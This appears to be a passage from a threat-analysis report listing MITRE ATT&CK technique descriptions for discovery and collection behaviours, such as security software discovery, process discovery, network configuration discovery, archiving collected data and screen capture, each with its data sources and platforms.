Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre